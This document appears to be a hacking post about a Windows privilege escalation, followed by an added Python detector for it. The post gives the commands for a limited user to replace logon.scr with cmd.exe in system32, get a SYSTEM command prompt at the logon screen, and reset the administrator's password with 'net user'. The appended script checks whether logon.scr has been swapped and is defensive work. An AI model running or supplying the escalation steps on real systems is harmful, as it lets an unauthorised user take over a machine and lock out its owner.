If you're logged in with a limited account, open an MS-DOS command line and type:
cd \windows\system32
md tmphack
copy logon.scr tmphack\logon.scr
copy cmd.exe tmphack\cmd.exe
del logon.scr
ren cmd.exe logon.scr
exit
Then we have to log off so that the screensaver runs as System. As admin pointed out in a comment, if the screensaver kicks in while we are still logged in as the user, we remain in a restricted environment.
What we have done is back up cmd.exe and the screensaver file, then put cmd.exe in place of the file that controls the screensaver, so that when the screensaver kicks in it opens a command line with administrator privileges, without our having logged in against the machine's SAM.
Then you can change the administrator password. For example, if the administrator user is vlan7 and you want to set the password to tmp, enter the following:
net user vlan7 tmp
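
A defender-side check for the file swap described above, added here as an example that is not part of the original post: it flags a logon.scr that is byte-identical to a cmd.exe copy or that carries the console subsystem in its PE header (a genuine screensaver is a GUI program). The function names and the fake_pe sample builder are assumptions made for this example.

```python
import hashlib, struct, sys
from pathlib import Path

IMAGE_SUBSYSTEM_WINDOWS_CUI = 3  # console program such as cmd.exe; screensavers are GUI (2)

def pe_subsystem(data):
    """Return the Subsystem field of a PE image, or None if data is not a PE file."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    off = e_lfanew + 4 + 20 + 68  # PE signature + COFF header + offset in optional header
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(data) < off + 2:
        return None
    return struct.unpack_from("<H", data, off)[0]

def check_logon_screensaver(system32):
    """Return a list of findings about logon.scr in the given system32 directory."""
    system32 = Path(system32)
    scr = system32 / "logon.scr"
    if not scr.is_file():
        return ["logon.scr is missing"]
    data = scr.read_bytes()
    findings = []
    # After the rename, cmd.exe may exist only as the backup copy in tmphack.
    for cmd in (system32 / "cmd.exe", system32 / "tmphack" / "cmd.exe"):
        if cmd.is_file() and hashlib.sha256(cmd.read_bytes()).digest() == hashlib.sha256(data).digest():
            findings.append(f"logon.scr is byte-identical to {cmd.relative_to(system32)}")
    subsystem = pe_subsystem(data)
    if subsystem is None:
        findings.append("logon.scr is not a valid PE file")
    elif subsystem == IMAGE_SUBSYSTEM_WINDOWS_CUI:
        findings.append("logon.scr is a console-subsystem executable")
    return findings

def fake_pe(subsystem):
    """Constructed minimal PE header used as sample input; not a real executable."""
    buf = bytearray(0x40 + 4 + 20 + 70)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", buf, 0x40 + 4 + 20 + 68, subsystem)
    return bytes(buf)

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else r"C:\Windows\System32"
    for finding in check_logon_screensaver(target):
        print("ALERT:", finding)
```
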